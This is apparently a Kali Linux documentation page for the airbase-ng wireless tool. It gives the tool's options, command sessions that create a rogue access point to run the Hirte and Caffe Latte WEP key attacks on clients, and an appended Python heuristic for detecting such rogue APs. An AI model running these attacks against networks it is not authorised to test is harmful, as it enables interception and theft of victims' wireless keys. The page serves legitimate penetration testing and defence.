Airbase-ng Introduction


Implements the Caffe Latte WEP client attack
Implements the Hirte WEP client attack
Ability to cause the WPA / WPA2 handshake to be captured

Author: Thomas d’Otreppe, Original work: Christophe Devine
License: GPL v2

Tool source: Homepage
Kali aircrack-ng Repo

airbase-ng – a multi-purpose tool aimed at attacking clients rather than the access point (AP) itself

root@kali:~# airbase-ng --help

  Airbase-ng 1.2 rc4 - (C) 2008-2015 Thomas d'Otreppe
  Original work: Martin Beck

  usage: airbase-ng <options> <replay interface>

    -a bssid  set Access Point MAC address
    -i iface  capture packets from this interface
    -w WEP key  use this WEP key to en-/decrypt packets
    -h MAC  source mac for MITM mode
    -f disallow  disallow specified client MACs (default: allow)
    -W 0|1    [don't] set WEP flag in beacons 0|1 (default: auto)
    -q  quiet (do not print statistics)
    -v  verbose (print more messages)
    -A  Ad-Hoc Mode (allows other clients to peer)
    -Y in|out|both  external packet processing
    -c channel  sets the channel the AP is running on
    -X   hidden ESSID
    -s   force shared key authentication (default: auto)
    -S   set shared key challenge length (default: 128)
    -L   Caffe-Latte WEP attack (use if driver can't send frags)
    -N   cfrag WEP attack (recommended)
    -x nbpps  number of packets per second (default: 100)
    -y   disables responses to broadcast probes
    -0   set all WPA,WEP,open tags. can't be used with -z & -Z
    -z type  sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
    -Z type  same as -z, but for WPA2
    -V type  fake EAPOL 1=MD5 2=SHA1 3=auto
    -F prefix  write all sent and received frames into pcap file
    -P  respond to all probes, even when specifying ESSIDs
    -I interval  sets the beacon interval value in ms
    -C seconds  enables beaconing of probed ESSID values (requires -P)
    -n hex  User specified ANonce when doing the 4-way handshake
    --help  Displays this usage screen

 Filter options:
   --bssid MAC  BSSID to filter/use
   --bssids file  read a list of BSSIDs out of that file
   --client MAC  MAC of client to filter
   --clients file  read a list of MACs out of that file
   --essid ESSID  specify a single ESSID (default: default)
   --essids file  read a list of ESSIDs out of that file
   --help  Displays this usage screen

airbase-ng Usage Examples

Hirte Attack - Access Point Mode

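The Hirte attack attempts to retrieve a WEP key via a client. This example creates an access point on channel 6 (-c 6) with the specified ESSID (-e TotallyNotATrap) and uses the cfrag WEP attack (-N), setting the WEP flag in the beacons (-W 1).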

root@kali:~# airbase-ng -c 6 -e TotallyNotATrap -N -W 1 wlan0mon
15:51:11  Created tap interface at0
15:51:11  Trying to set MTU on at0 to 1500
15:51:11  Trying to set MTU on wlan0mon to 1800
15:51:11  Access Point with BSSID 3C:46:D8:4E:EF:AA started.

Caffe Latte Attack - 接入点模式

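As with the Hirte attack, the Caffe Latte attack attempts to retrieve a WEP key via a client. This example creates an access point on channel 6 (-c 6) with the specified ESSID (-e AlsoNotATrap) and uses the Caffe Latte WEP attack (-L), setting the WEP flag in the beacons (-W 1).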

root@kali:~# airbase-ng -c 6 -e AlsoNotATrap -L -W 1 wlan0mon
15:56:05  Created tap interface at0
15:56:05  Trying to set MTU on at0 to 1500
15:56:05  Access Point with BSSID 3C:46:D8:4E:EF:AA started.
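
From the defender's side, both sessions above leave the same trace on the air: one BSSID beaconing more than one ESSID with the WEP flag set. The following is an added example, not part of the original page or of the aircrack-ng project, that applies three survey heuristics to constructed beacon observations; the inventory, the `CorpWiFi` ESSID, the reason codes and the function name are assumptions made for illustration.

```python
from collections import defaultdict

# Constructed inventory of authorised APs: ESSID -> {BSSID: expected encryption}.
AUTHORISED = {"CorpWiFi": {"00:11:22:33:44:55": "WPA2"}}

# Constructed survey rows (bssid, essid, channel, encryption). The 3C:46:... BSSID
# and the two "NotATrap" ESSIDs are taken from the sessions above; the rest is made up.
BEACONS = [
    ("00:11:22:33:44:55", "CorpWiFi", 1, "WPA2"),
    ("3c:46:d8:4e:ef:aa", "TotallyNotATrap", 6, "WEP"),
    ("3C:46:D8:4E:EF:AA", "AlsoNotATrap", 6, "WEP"),
    ("3C:46:D8:4E:EF:AA", "CorpWiFi", 6, "WEP"),
]

def find_suspect_aps(beacons, authorised):
    """Return a sorted list of (bssid, reason_code, detail) findings."""
    findings = set()
    essids_by_bssid = defaultdict(set)
    for bssid, essid, _channel, enc in beacons:
        bssid = bssid.upper()              # MACs compare case-insensitively
        essids_by_bssid[bssid].add(essid)
        known = authorised.get(essid)
        if known is None:
            continue                       # not our ESSID; only the multi-ESSID check applies
        if bssid not in known:
            findings.add((bssid, "UNKNOWN_BSSID", essid))
        if enc not in known.values():
            findings.add((bssid, "ENC_MISMATCH", f"{essid}: saw {enc}"))
    for bssid, essids in essids_by_bssid.items():
        if len(essids) > 1:                # production APs normally use one BSSID per ESSID
            findings.add((bssid, "MULTI_ESSID", ", ".join(sorted(essids))))
    return sorted(findings)

if __name__ == "__main__":
    for finding in find_suspect_aps(BEACONS, AUTHORISED):
        print(*finding, sep="  ")
```

These are heuristics for triage: a finding means the BSSID deserves a closer look against the site's AP inventory, not that an attack is confirmed.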